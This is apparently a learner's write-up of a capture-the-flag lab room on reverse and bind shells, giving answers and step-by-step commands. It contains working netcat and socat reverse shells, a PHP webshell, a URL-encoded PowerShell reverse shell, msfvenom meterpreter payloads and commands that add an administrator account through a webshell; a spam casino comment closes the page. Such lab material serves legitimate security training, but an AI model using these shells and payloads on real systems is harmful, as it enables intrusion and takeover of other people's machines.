This is a write-up for a room called 'What the Shell?' on Tryhackme
Task 3 Types of Shell
Q: Which type of shell connects back to a listening port on your computer, Reverse (R) or Bind (B)?
A: R
Q: You have injected malicious shell code into a website. Is the shell you receive likely to be interactive? (Y or N)
A: N
Q: When using a bind shell, would you execute a listener on the Attacker (A) or the Target (T)?
A: T
Task 4 Netcat
Q: Which option tells netcat to listen?
A: -l
Q: How would you connect to a bind shell on the IP address: 10.10.10.11 with port 8080?
A: nc 10.10.10.11 8080
Task 5 Netcat Shell Stabilisation
Q: How would you change your terminal size to have 238 columns?
A: stty cols 238
Q: What is the syntax for setting up a Python3 webserver on port 80?
A: sudo python3 -m http.server 80
Task 6 Socat
Q: How would we get socat to listen on TCP port 8080?
A: TCP-L:8080
Task 7 Socat Encrypted Shells
Q: What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem"
A: socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0
Q: If your IP is 10.10.10.5, what syntax would you use to connect back to this listener?
A: socat OPENSSL:10.10.10.5:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Task 8 Common Shell Payloads
Q: What command can be used to create a named pipe in Linux?
A: mkfifo
Task 9 msfvenom
Q: Generate a staged reverse shell for a 64 bit Windows target, in a .exe format using your TryHackMe tun0 IP address and a chosen port
A: msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port number>
Q: Which symbol is used to show that a shell is stageless?
A: _
Q: What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell
A: msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443
Task 10 Metasploit multi/handler
Q: What command can be used to start a listener in the background?
A: exploit -j
Q: If we had just received our tenth reverse shell in the current Metasploit session, what would be the command used to foreground it?
A: sessions 10
Task 13 Practice and Examples
Q: Try uploading a webshell to the Linux box, then use the command: nc <LOCAL-IP> <PORT> -e /bin/bash to send a reverse shell back to a waiting listener on your own machine
A: create a new file with '.php' extension and save the file with below statement
<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
upload the file to the deployed machine.
run a netcat listener with below command
nc -lvnp <port-num>
example: nc -lvnp 1346
To catch the reverse shell we need to run the web shell we uploaded with GET PARAMETERS
command we need to use is
nc <ip> <port-num> -e /bin/bash
example: nc 127.0.0.1 5556 -e /bin/bash
we need to run the above command as get paramter for a url.
http://ip/uploads/shell.php?cmd=nc%20local-ip%20port%20-e%20%2fbin%2fbash
By running the above command,We can have a reverse shell.
Note: we need to use %20 to represent space and / can be represented by using %2f
Q: Navigate to /usr/share/webshells/php/php-reverse-shell.php
in Kali and change the IP and port to match your tun0 IP with a custom
port. Set up a netcat listener, then upload and activate the shell
A: By running below command,we can copy the reverse shell to our Desktop
cp /usr/share/webshells/php/php-reverse-shell.php /home/kali/Desktop
change $ip variable value to your tun0 ip address and $port variable value to any number between 1024 to 65535 and upload the file.
setup a netcat listener with command
nc -lvnp <port-num>
example: nc -lvnp 5656
access the uploaded file with below url
http://ip/uploads/php-reverse-shell.php
now we have a reverse shell
Q: Log into the Linux machine over SSH using the credentials in task 14. Use the techniques in Task 8 to experiment with bind and reverse netcat shells.
A: ssh into the linux machine
REVERSE SHELL
run below command on attacker's terminal
nc -lvnp 5555
run below command on target's terminal
nc <tun0-ip> 5555 -e /bin/bash
BIND SHELL
run below command on target's terminal
nc -lvnp 5556 -e /bin/bash
run below command on attacker's terminal
nc <target-ip> 5556
Q: Practice reverse and bind shells using Socat on the Linux machine. Try both the normal and special techniques.
A: SOCAT REVERSE SHELL
run below command on attacker's terminal to start a socat listener
socat TCP-L:5566 -
run below command on target's terminal to connect back to socat listener
socat TCP:<tun0-ip>:5566 EXEC:"bash -li"
SOCAT BIND SHELL
run below command on target's terminal
socat TCP-L:7788 EXEC:"bash -li"
run below command on attacker's terminal
socat TCP:<ip>:7788 -
SOCAT SPECIAL TECHNIQUES
run below command on attacker's terminal
socat TCP-L:5353 FILE:`tty`,raw,echo=0
run below command on target's terminal
socat TCP:<tun0-ip>:5353 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Q: Look through Payloads all the Things and try some of the other reverse shell techniques. Try to analyse them and see why they work.
A: Try Payloads of your choice
Q: Switch to the Windows VM. Try uploading and activating the php-reverse-shell. Does this work?
A: No, its not working
Q: Upload a webshell on the Windows target and try to obtain a reverse shell using Powershell.
A: create a new file with below command and save with '.php' extension
<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
create a netcat listener in attacker's machine
nc -lvnp 1337
run the below query on the browser
http://ip/uploads/shell.php?cmd=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient(%2710.9.220.185%27%2C1337)%3B%24stream%20%3D%20%24client.GetStream()%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile((%24i%20%3D%20%24stream.Read(%24bytes%2C%200%2C%20%24bytes.Length))%20-ne%200)%7B%3B%24data%20%3D%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString(%24bytes%2C0%2C%20%24i)%3B%24sendback%20%3D%20(iex%20%24data%202%3E%261%20%7C%20Out-String%20)%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20(pwd).Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20(%5Btext.encoding%5D%3A%3AASCII).GetBytes(%24sendback2)%3B%24stream.Write(%24sendbyte%2C0%2C%24sendbyte.Length)%3B%24stream.Flush()%7D%3B%24client.Close()%22%0A
note: replace ip with the deployed machine ip
Q: The webserver is running with SYSTEM privileges. Create a new user and add it to the "administrators" group, then login over RDP or WinRM.
A: To Create a new user run below command
http://<ip>/uploads/shell.php?cmd=net user <username> <password> /add
note: replace the ip with deployed machine ip and username and password fields with your choice
To add the user to Administrators group,run below command
http://<ip>/uploads/shell.php?cmd=net localgroup administrators username /add
note: replace ip with machine ip and username with the username created
To LOGIN using RDP try below command
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:10.10.16.131 /u:<username> /p:<password>
note: replace username and password in the above command
Q: Experiment using socat and netcat to obtain reverse and bind shells on the Windows Target.
A: NETCAT REVERSE SHELL
start a netcat listener in attacker's terminal
nc -lvnp 1337
login to windows machine using RDP.And run the below command in cmd
nc <tun0-ip> 1337 -e "cmd.exe"
NETCAT BIND SHELL
start a netcat listener on cmd
nc -lvnp 3333 -e "cmd.exe"
run below command on attacker's terminal
nc <target-ip> 3333
SOCAT REVERSE SHELL
run below command on attacker's terminal
socat TCP-L:8888 -
run below command on target's cmd
socat TCP:<tun0-ip>:8888 EXEC:powershell.exe,pipes
SOCAT BIND SHELL
run below command on cmd to start a socat listener
socat TCP-L:2323 EXEC:powershell.exe,pipes
run below command on attacker's terminal
socat TCP:<target-ip>:2323 -
Q: Create a 64bit Windows Meterpreter shell using msfvenom and upload it to the Windows Target. Activate the shell and catch it with multi/handler. Experiment with the features of this shell.
A: To create a 64bit Windows Meterpreter shell,run the below command
msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -o shell.exe LHOST=<tun0-ip> LPORT=2020
*upload the shell.exe
*run 'msfconsole' in attacker's terminal
*'run multi/handler'
*set LHOST=<tun0-ip> ,set LPORT=2020 , set payload to 'windows/x64/meterpreter/reverse_tcp'
*exploit
This will start a listener
Now execute the shell.exe payload using rdp.After executing the exe.we will have a meterpreter shell.
Q: Create both staged and stageless meterpreter shells for either target. Upload and manually activate them, catching the shell with netcat -- does this work?
A: To create a staged meterpreter shell,use below command
msfvenom -p windows/x64/meterpreter/reverse_shell -f exe -o stagedcmd.exe LHOST=<tun-0-ip> LPORT=2020
To create a non staged meterpreter shell, use below command
msfvenom -p windows/x64/meterpreter_reverse_shell -f exe -o nonstagedcmd.exe LHOST=<tun0-ip> LPORT=2020
create a netcat listener
nc -lvnp 2020\
Does this work?
No, both staged and non staged meterpreter payloads are not working.
Pragmatic Play debuts Live Casino Slot - JamBase
ReplyDeletePragmatic Play debuts Live Casino Slot - New Online Slot · A new online 안산 출장샵 slot that was originally created 목포 출장마사지 by 상주 출장샵 provider Pragmatic Play 서산 출장샵 has 경상북도 출장샵 been launched. · The